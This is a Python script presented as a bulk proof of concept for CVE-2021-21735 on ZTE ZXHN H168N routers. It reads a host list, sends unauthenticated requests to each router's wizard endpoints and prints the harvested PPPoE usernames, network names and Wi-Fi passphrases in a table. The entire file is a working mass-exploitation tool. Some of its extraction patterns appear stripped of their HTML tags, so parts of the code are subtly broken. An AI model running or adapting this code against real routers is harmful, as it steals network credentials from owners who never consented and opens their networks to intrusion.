import argparse
import asyncio
import html
import re
from pathlib import Path
import aiohttp
from colorama import Fore, Style, init
DEFAULT_INPUT_PATH = Path("urls.txt")
PASSWORD_FORM = {
"IF_ACTION": "GetPassword",
"_InstID_PASS": "DEV.WIFI.AP1.PSK1",
"PASSTYPE": "PSK",
}
TABLE_TEMPLATE = "{:<3} | {:<34} | {:<30} | {:<30} | {:<30} | {:<25}"
HEADERS = ["#", "URL", "AD Username", "VD Username", "ESSID", "Wi-Fi Password"]
AD_USERNAME_PATTERN = r"(.*?)"
VD_USERNAME_PATTERN = r"(.*?)"
ESSID_PATTERN = r"\s*ESSID\s*\s*\s*(.*?)\s*"
PASSWORD_PATTERN = r"KeyPassphrase\s*(.*?)"
init()
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description="Bulk PoC for CVE-2021-21735 against ZTE ZXHN H168N wizard endpoints."
)
parser.add_argument(
"-i",
"--input",
type=Path,
default=DEFAULT_INPUT_PATH,
help="Path to a newline-delimited host list.",
)
parser.add_argument(
"--timeout",
type=int,
default=10,
help="Per-host request timeout in seconds.",
)
return parser.parse_args()
def extract(pattern: str, text: str, default: str = "") -> str:
match = re.search(pattern, text, re.DOTALL)
if not match:
return default
return html.unescape(match.group(1).strip())
def load_hosts(input_path: Path) -> list[str]:
return [line.strip() for line in input_path.read_text(encoding="utf-8").splitlines() if line.strip()]
async def fetch_text(session: aiohttp.ClientSession, method: str, url: str, **kwargs) -> str:
async with session.request(method, url, **kwargs) as response:
response.raise_for_status()
return await response.text()
async def extract_router_secrets(session: aiohttp.ClientSession, host: str) -> dict[str, str]:
base_url = f"http://{host}/wizard_page"
try:
pppoe_xml = await fetch_text(session, "GET", f"{base_url}/wizard_pppoe_lua.lua")
wlan_xml = await fetch_text(session, "GET", f"{base_url}/wizard_wlan_config_lua.lua")
password_xml = await fetch_text(
session,
"POST",
f"{base_url}/wizard_wlan_config_lua.lua",
data=PASSWORD_FORM,
)
except Exception:
return {
"URL": host,
"AD Username": "",
"VD Username": "",
"ESSID": "",
"Wi-Fi Password": "",
}
return {
"URL": host,
"AD Username": extract(AD_USERNAME_PATTERN, pppoe_xml),
"VD Username": extract(VD_USERNAME_PATTERN, pppoe_xml),
"ESSID": extract(ESSID_PATTERN, wlan_xml),
"Wi-Fi Password": extract(PASSWORD_PATTERN, password_xml)[:64],
}
def print_header() -> None:
header = TABLE_TEMPLATE.format(
"#",
Fore.RED + HEADERS[1],
Fore.GREEN + HEADERS[2],
Fore.YELLOW + HEADERS[3],
Fore.BLUE + HEADERS[4],
Fore.MAGENTA + HEADERS[5] + Style.RESET_ALL,
)
separator = Fore.CYAN + "-" * len(header) + Style.RESET_ALL
print(separator)
print(header + "|")
print(separator)
def print_row(index: int, row: dict[str, str]) -> None:
rendered = TABLE_TEMPLATE.format(
str(index),
Fore.RED + row["URL"],
Fore.GREEN + row["AD Username"],
Fore.YELLOW + row["VD Username"],
Fore.BLUE + row["ESSID"],
Fore.MAGENTA + row["Wi-Fi Password"] + Style.RESET_ALL,
)
separator = Fore.CYAN + "-" * len(rendered) + Style.RESET_ALL
print(rendered + "|")
print(separator)
async def run_bulk_poc(input_path: Path, timeout_seconds: int) -> None:
hosts = load_hosts(input_path)
seen: set[tuple[str, str, str, str, str]] = set()
results: list[dict[str, str]] = []
print_header()
timeout = aiohttp.ClientTimeout(total=timeout_seconds)
async with aiohttp.ClientSession(timeout=timeout) as session:
tasks = [asyncio.create_task(extract_router_secrets(session, host)) for host in hosts]
for task in asyncio.as_completed(tasks):
try:
row = await task
except Exception as error:
print(f"{Fore.RED}Error: {error}{Style.RESET_ALL}")
continue
identity = (
row["URL"],
row["AD Username"],
row["VD Username"],
row["ESSID"],
row["Wi-Fi Password"],
)
if identity in seen:
continue
seen.add(identity)
results.append(row)
print_row(len(results), row)
def main() -> None:
args = parse_args()
asyncio.run(run_bulk_poc(args.input, args.timeout))
if __name__ == "__main__":
main()